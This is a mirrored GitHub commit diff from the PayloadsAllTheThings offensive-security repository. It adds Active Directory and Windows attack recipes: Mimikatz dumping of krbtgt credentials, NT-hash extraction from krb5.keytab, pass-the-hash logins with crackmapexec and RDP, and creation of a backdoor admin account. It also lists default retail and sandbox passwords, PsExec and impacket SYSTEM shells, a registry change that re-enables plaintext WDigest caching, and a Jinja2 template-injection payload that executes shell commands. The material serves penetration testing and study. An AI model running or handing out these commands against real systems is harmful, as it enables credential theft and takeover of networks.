ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

krb5.keytab + credential use summary

Browse Source
This commit is contained in:
Swissky 2019-10-20 13:25:06 +02:00
parent 7159a3ded3
commit ed252df92e
4 changed files with 97 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
Methodology and Resources/Active Directory Attack.md
View File

@ -13,6 +13,7 @@
* Using vssadmin * Using vssadmin
* Using DiskShadow * Using DiskShadow
* Using Mimikatz DCSync * Using Mimikatz DCSync
* Using Mimikatz sekurlsa
* [Password in AD User comment](#password-in-ad-user-comment) * [Password in AD User comment](#password-in-ad-user-comment)
* [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
* [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
@ -28,6 +29,7 @@
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
* [PrivExchange attack](#privexchange-attack) * [PrivExchange attack](#privexchange-attack)
* [Password spraying](#password-spraying) * [Password spraying](#password-spraying)
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
* [PXE Boot image attack](#pxe-boot-image-attack) * [PXE Boot image attack](#pxe-boot-image-attack)
## Tools ## Tools
@ -393,6 +395,15 @@ mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
#### Using Mimikatz sekurlsa
Dumps credential data in an Active Directory domain when run on a Domain Controller.
:warning: Requires administrator access with debug or Local SYSTEM rights
```powershell
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt
```
### Password in AD User comment ### Password in AD User comment
@ -902,6 +913,30 @@ Most of the time the best passwords to spray are :
- Welcome1 - Welcome1
- $Companyname1 - $Companyname1
### Extract accounts from /etc/krb5.keytab
The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure.
Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user.
```powershell
$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
[...]
[26] Service principal: host/COMPUTER@DOMAIN
KVNO: 25
Key type: 23
Key: 6b3723410a3c54692e400a5862256e0a
Time stamp: Oct 07, 2019 09:12:02
[...]
```
Connect to the machine using the account and the hash with CME.
```powershell
$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN"
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a
```
### PXE Boot image attack ### PXE Boot image attack
@ -1006,3 +1041,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)

5
Methodology and Resources/Windows - Mimikatz.md
View File

@ -24,6 +24,10 @@ mimikatz # sekurlsa::wdigest
```powershell ```powershell
mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest mimikatz_command -f sekurlsa::wdigest
# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
``` ```
## Mimikatz - Mini Dump ## Mimikatz - Mini Dump
@ -108,3 +112,4 @@ More informations can be grabbed from the Memory with :
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)

76
Methodology and Resources/Windows - Using credentials.md
View File

@ -1,6 +1,25 @@
# Windows - Using credentials # Windows - Using credentials
## TIP 1 - Create your credential :D ## Summary
* [TIPS](#tips)
* [TIP 1 - Create your credential](#tip-1-create-your-credential)
* [TIP 2 - Retail Credential](#tip-2-retail-credential)
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
* [Metasploit](#metasploit)
* [Metasploit - SMB](#metasploit-smb)
* [Metasploit - Psexec](#metasploit-psexec)
* [Crackmapexec](#crackmapexec)
* [Winexe](#winexe)
* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py)
* [PsExec - Sysinternal](#psexec-sysinternal)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Netuse](#netuse)
* [Runas](#runas)
## TIPS
### TIP 1 - Create your credential
```powershell ```powershell
net user hacker hacker1234* /add net user hacker hacker1234* /add
@ -17,7 +36,9 @@ net user /dom
net user /domain net user /domain
``` ```
## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) ### TIP 2 - Retail Credential
Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
@ -26,7 +47,9 @@ Username: RetailAdmin
Password: trs10 Password: trs10
``` ```
## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) ### TIP 3 - Sandbox Credential - WDAGUtilityAccount
WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
@ -37,7 +60,9 @@ Password: pw123
``` ```
## Metasploit - SMB ## Metasploit
### Metasploit - SMB
```c ```c
use auxiliary/scanner/smb/smb_login use auxiliary/scanner/smb/smb_login
@ -49,7 +74,7 @@ run
creds creds
``` ```
## Metasploit - Psexec ### Metasploit - Psexec
Note: the password can be replaced by a hash to execute a `pass the hash` attack. Note: the password can be replaced by a hash to execute a `pass the hash` attack.
@ -63,27 +88,27 @@ run
shell shell
``` ```
## Crackmapexec (Integrated to Kali) ## Crackmapexec
```python ```python
git clone https://github.com/byt3bl33d3r/CrackMapExec.github git clone https://github.com/byt3bl33d3r/CrackMapExec.github
python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
``` # pass the hash
## Crackmapexec (Pass The Hash)
```powershell
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
``` ```
## Winexe (Integrated to Kali) ## Winexe
Integrated to Kali
```python ```python
winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
``` ```
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) ## Psexec.py / Smbexec.py / Wmiexec.py
from Impacket
```python ```python
git clone https://github.com/CoreSecurity/impacket.git git clone https://github.com/CoreSecurity/impacket.git
@ -95,7 +120,16 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10
# switch admin user to NT Authority/System # switch admin user to NT Authority/System
``` ```
## RDP Remote Desktop Protocol (Impacket) ## PsExec - Sysinternal
from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
```powershell
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
```
## RDP Remote Desktop Protocol
```powershell ```powershell
python rdpcheck.py DOMAIN/username:password@10.10.10.10 python rdpcheck.py DOMAIN/username:password@10.10.10.10
@ -139,24 +173,20 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1
``` ```
## Netuse (Windows) ## Netuse
Windows only
```powershell ```powershell
net use \\ordws01.cscou.lab /user:DOMAIN\username password net use \\ordws01.cscou.lab /user:DOMAIN\username password
C$ C$
``` ```
## Runas (Windows - Kerberos auth) ## Runas
```powershell ```powershell
runas /netonly /user:DOMAIN\username "cmd.exe" runas /netonly /user:DOMAIN\username "cmd.exe"
``` runas /noprofil /netonly /user:DOMAIN\username cmd.exe
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
```powershell
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
``` ```
## References ## References

1
Server Side Template Injection/README.md
View File

@ -288,6 +288,7 @@ nv -lnvp 8000
```python ```python
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
``` ```
#### Exploit the SSTI by calling Popen without guessing the offset #### Exploit the SSTI by calling Popen without guessing the offset